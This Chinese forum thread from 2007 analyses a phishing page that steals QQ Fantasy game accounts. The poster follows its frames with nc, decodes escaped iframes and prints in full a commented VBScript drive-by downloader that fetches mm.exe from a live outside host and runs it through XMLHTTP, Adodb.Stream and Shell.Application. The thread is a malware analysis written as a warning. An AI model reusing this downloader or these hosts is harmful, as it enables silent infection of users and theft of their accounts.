[讨论] 一个QQ幻想盗号木马的分析（原创）

大家好，我是一个Crazy About计算机的高中生，Tydus。
这几个月前我闲来无事就开始玩QQ幻想（下简称FO）。看到这幻想世界里面有这样一种人：
[引用]
新年提示03:[系统]新年欢乐送!凡35级以上没领取过的玩家登陆:foyy.7799.cn/领取"新年礼物"春天套装/水兽"千年蟠桃.
[结束引用]
这个会蒙骗一些新玩家，让他们打开这个地址：http://foyy.7799.cn/[color=Red]（危险，大家不要访问）[/color]
我今天就陪他玩玩。

先NC下它（看红色的）：
[引用]
C:\>nc foyy.7799.cn 80
GET / HTTP/1.1
Host: foyy.7799.cn

HTTP/1.1 200 OK
Date: Fri, 09 Feb 2007 09:38:47 GMT
Server: Apache/1.3.28 (Unix) PHP/4.3.2
X-Powered-By: PHP/4.3.2
Transfer-Encoding: chunked
Content-Type: text/html

e6
<html>
<head>
<title>QQ幻想领取处...</title>
</head>
<frameset rows="100%,*" border="0" frameborder="0" framespacing="0" framecolor="#000000">
[color=Red]<frame src=http://az01.129.tofor.com/1/  scrolling="auto">[/color]
</frameset>
</body>
</html>

0

[结束引用]

显然，一个frame跳转到[color=Red]http://az01.129.tofor.com/1/[/color]
然后我们继续NC它（依然看红色的）：
[引用]
C:\>nc az01.129.tofor.com 80
GET /1/ HTTP/1.1
Host: az01.129.tofor.com

HTTP/1.1 200 OK
Content-Length: 11776
Content-Type: text/html
Content-Location: http://az01.129.tofor.com/1/index.htm
Last-Modified: Sun, 31 Dec 2006 17:58:55 GMT
Accept-Ranges: bytes
ETag: "2c5cc15652dc71:204e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 09 Feb 2007 08:55:39 GMT

<head>
<meta http-equiv="Content-Language" content="zh-cn">
<base href="http://fo.qq.com/index.shtml">
[color=Red]<SCRIPT LANGUAGE="Javascript">

</SCRIPT>[/color]
<html>...</html>[color=Red]（这些由于很长，略过，我把HTML文件放在附件里面，有兴趣的可以去下载。）[/color]












<script>
function click() {
if (event.button==2) {
alert('由于是[活动网站],为了安全,已加密,请勿使用右键!')
} }
document.onmousedown=click
</script>

[结束引用]

下面骗取帐号跟密码的就不用说了吧？就是提交到一个asp（/ljsjk.asp），然后记录下用户名跟密码。
重点说上面红色的地方
这个很显然是一个Escape加密，解密的话可以直接把Document.write改成Alert。
[引用]
<iframe src="http://%77%77%77%2E%79%73%67%61%73%65%73%2E%63%6F%6D/%69%6D%61%67%65%73/%77%2E%68%74%6D" name="zhu" width="0" height="0" frameborder="0"></iframe>
[结束引用]
又是一个Unicode转义（其实Unescape就是Unicode转义的）
再次解密
[引用]
<iframe src="[color=Red]http://www.ysgases.com/images/w.htm[/color]" name="[color=Red]zhu[/color]" width="0" height="0" frameborder="0"></iframe>
[结束引用]
是一个Iframe，这里有一句有趣的话，name="[color=Red]zhu[/color]"，大概说上当的人都是猪吧（偷笑）。
好，[color=Red]http://www.ysgases.com/images/w.htm[/color]
继续NC（看红的）（只保留HTML，把HTTP握手的过程省略）：

[引用]
<iframe src="http://%77%77%77%2E%79%73%67%61%73%65%73%2E%63%6F%6D/%69%6E%62%62%73/%69%6D%61%67%65%73/%73%6B%69%6E%73/%34/%7A%34%2E%68%74%6D" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://%77%77%77%2E%79%73%67%61%73%65%73%2E%63%6F%6D/%69%6E%62%62%73/%69%6D%61%67%65%73/%73%6B%69%6E%73/%34/%7A%36%2E%68%74%6D" name="zhu" width="0" height="0" frameborder="0"></iframe>
[结束引用]
一样的方法，Unescape

[引用]
<iframe src="http://www.ysgases.com/inbbs/images/skins/4/z4.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.ysgases.com/inbbs/images/skins/4/z6.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
[结束引用]
不知道这里为什么分成2个，我们继续。
NC：
[引用]
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
[结束引用]（待续）

回复引用

小竹子

暖阳中的小苗

Rank: 7 Rank: 7 Rank: 7

UID: 5607
帖子: 98
积分: 67
紫菀: 0 朵
花瓣: 112 片
花蕊: 14 朵
野草莓: 0 个
蒲公英: 0 朵
社区等级: 7 级
在线时间: 43 小时
注册时间: 2007-1-21
蜗居何地: 四川
登录状态: 当前离线

沙发

发表于 2007-2-11 10:22 | 只看该作者

我是文盲..漂过...

－　－！

回复引用

TOP

tyeken8

月夜中的小苗

Rank: 6 Rank: 6

UID: 4790
帖子: 98
积分: 54
紫菀: 0 朵
花瓣: 130 片
花蕊: 3 朵
野草莓: 0 个
蒲公英: 0 朵
社区等级: 6 级
在线时间: 19 小时
注册时间: 2006-12-30
蜗居何地: TJ
登录状态: 当前离线

板凳

发表于 2007-2-11 10:22 | 只看该作者

Unescape：
[引用]
<SCRIPT LANGUAGE="JavaScript">

</SCRIPT>
[结束引用]

之后这个就不知道是什么方式的加密了（我孤陋寡闻，再加上2年多不玩Hack了（惭愧ing））
不过我还是可以把它拆开：
这个网页木马有问题，大家看上面红色的部分，明显多了几个字符。
而且由正确的方式解密之后也是一片乱码（我怀疑是代码页的问题，望高手指点），所以先放弃分析这个网页。

Z6.htm:
[引用]
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
[结束引用]
一样的Unescape。

[引用]
<SCRIPT>var Words="%3Chtml%3E%0D%0A%3Cscript language%3D%22VBScript%22%3E%0D%0Aon error resume next%0D%0AMyQQ5372453%3D%22http%3A%2F%2Fwww%2Eysgases%2Ecom%2Finbbs%2Fimages%2Fskins%2F4%2Fmm%2Eexe%22%0D%0ASet CAOc %3D document%2EcreateElement%28%22object%22%29%0D%0Ac1 %3D%22clsid%3ABD%22%0D%0Ac2%3D%2296C556%2D65A3%2D11%22%0D%0Ac3%3D%22D0%2D983A%2D00C04F%22%0D%0Ac4%3D%22C29E36%22%0D%0ACAOc%2EsetAttribute %22classid%22%2Cc1%2Bc2%2Bc3%2Bc4%0D%0Aseturla%3D%22down%22%0D%0Aseturlb%3D%22file%22%0D%0Aseturlc%3D%22copy%22%0D%0Aseturld%3D%22exit%22%0D%0Aseturle%3D%22base%22%0D%0ACAOi%3D%22Microsoft%2EXMLHTTP%22%0D%0ASet CAOd %3D CAOc%2ECreateObject%28CAOi%2C%22%22%29%0D%0Aseturlf%3D%22Ado%22%0D%0Aseturlg%3D%22db%2E%22%0D%0Aseturlh%3D%22Str%22%0D%0Aseturli%3D%22eam%22%0D%0ACAOf%3Dseturlf%26seturlg%26seturlh%26seturli%0D%0ACAOg%3DCAOf%0D%0Aset CAOa %3D CAOc%2Ecreateobject%28CAOg%2C%22%22%29%0D%0ACAOa%2Etype %3D 1%0D%0ACAOh%3D%22GET%22%0D%0ACAOd%2EOpen CAOh%2C MyQQ5372453%2C False%0D%0ACAOd%2ESend%0D%0ACAO9%3D%22mm%2Eexe%22%0D%0Aset CAOb %3D CAOc%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0Aset CAOe %3D CAOb%2EGetSpecialFolder%282%29%0D%0ACAOa%2Eopen%0D%0ACAO8%3D%22CAOa%2EBuildPath%28CAOa%2CCAO8%29%22%0D%0ACAO7%3D%22CAOb%2EBuildPath%28CAOb%2CCAO7%29%22%0D%0ACAO6%3D%22CAOc%2EBuildPath%28CAOd%2CCAO6%29%22%0D%0ACAO5%3D%22CAOd%2EBuildPath%28CAOf%2CCAO5%29%22%0D%0ACAO4%3D%22CAOe%2EBuildPath%28CAOg%2CCAO4%29%22%0D%0ACAO3%3D%22CAOf%2EBuildPath%28CAOh%2CCAO4%29%22%0D%0ACAO2%3D%22CAOg%2EBuildPath%28CAOi%2CCAO3%29%22%0D%0ACAO1%3D%22CAOh%2EBuildPath%28CAOg%2CCAO1%29%22%0D%0ACAO0%3D%22CAOi%2EBuildPath%28CAOk%2CCAO0%29%22%0D%0ACAO9%3D CAOb%2EBuildPath%28CAOe%2CCAO9%29%0D%0ACAOa%2Ewrite CAOd%2EresponseBody%0D%0ACAOa%2Esavetofile CAO9%2C2%0D%0ACAOa%2Eclose%0D%0Aset CAOe %3D CAOc%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0ACAOe%2EShellExecute CAO9%2CBBS%2CBBS%2C%22open%22%2C 0%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
[结束引用]
又是一个无聊的Unescape。（待续）

回复引用

TOP

tyeken8

月夜中的小苗

Rank: 6 Rank: 6

UID: 4790
帖子: 98
积分: 54
紫菀: 0 朵
花瓣: 130 片
花蕊: 3 朵
野草莓: 0 个
蒲公英: 0 朵
社区等级: 6 级
在线时间: 19 小时
注册时间: 2006-12-30
蜗居何地: TJ
登录状态: 当前离线

地板

发表于 2007-2-11 10:23 | 只看该作者

好，露出原形了，Adodb.stream+XMLHTTP+FSO网页木马
我来解释一下
[引用]
<html>
<script language="VBScript">
on error resume next'遇到错误不提示继续，看来考虑地很周全
MyQQ5372453="http://www.ysgases.com/inbbs/images/skins/4/mm.exe"'木马的下载地址
Set CAOc = document.createElement("object")
c1 ="clsid:BD"'把字符分段，这样人家查不出来
c2="96C556-65A3-11"'同上
c3="D0-983A-00C04F"'同上
c4="C29E36"'同上
CAOc.setAttribute "classid",c1+c2+c3+c4'把分段的组合起来就是"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"，设置Classid的属性为clsid（也就是RDS.DataSpace 对象）用于创建客户端代理以自定义位于中间层的业务对象（可以理解为Server对象）
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")'熟悉的Server.CreateObject方法，创建一个XMLHTTP对象。XMLHTTP是一种浏览器对象，可用于模拟http的GET和POST请求。
seturlf="Ado"'分段
seturlg="db."'同上
seturlh="Str"'同上
seturli="eam"'同上
CAOf=seturlf&seturlg&seturlh&seturli'合起来"Adodb.stream"
CAOg=CAOf'不知搞什么飞机
set CAOa = CAOc.createobject(CAOg,"")'创建一个Adodb.Stream对象，用来读写流，我们接着看。
CAOa.type = 1'指定数据类型为二进制
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
'Open方法，就是HTTP协议里面的
'nc www.ysgases.com 80
'GET /inbbs/images/skins/4/mm.exe
'且为同步方式（也就是不完成这句就不继续，保证木马下载完成）
CAO9="mm.exe"'exe文件名，其实可以写成Mid(MyQQ5372453,InStrRev(MyQQ5372453,"/")+1)
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")'熟悉的FSO对象
set CAOe = CAOb.GetSpecialFolder(2)'取得临时文件夹路径
CAOa.open'执行XMLHTTP的GET请求
'这个家伙，写这么长，诚心的哈>_<
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
'其实上面的都是唬人的，下面根本没有地方调用这些字符串
CAO9= CAOb.BuildPath(CAOe,CAO9) '调用FSO的建立路径方法从临时文件夹建立一个MM.exe的文件
CAOa.write CAOd.responseBody'向文件写入下载到的木马内容（我先做个预言哈，responseBody的前两个字符一定是"MZ"（哪里来的鸡蛋阿～））
CAOa.savetofile CAO9,2'正式写入文件（前面都在内存里呢）2表示覆盖
CAOa.close'关闭文件
set CAOe = CAOc.createobject("Shell.Application","")'创建一个Shell.Application对象用来运行木马
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0'运行mm.exe（BBS就是Null）
</script>
</html>
[结束引用]（待续）

回复引用

TOP

tyeken8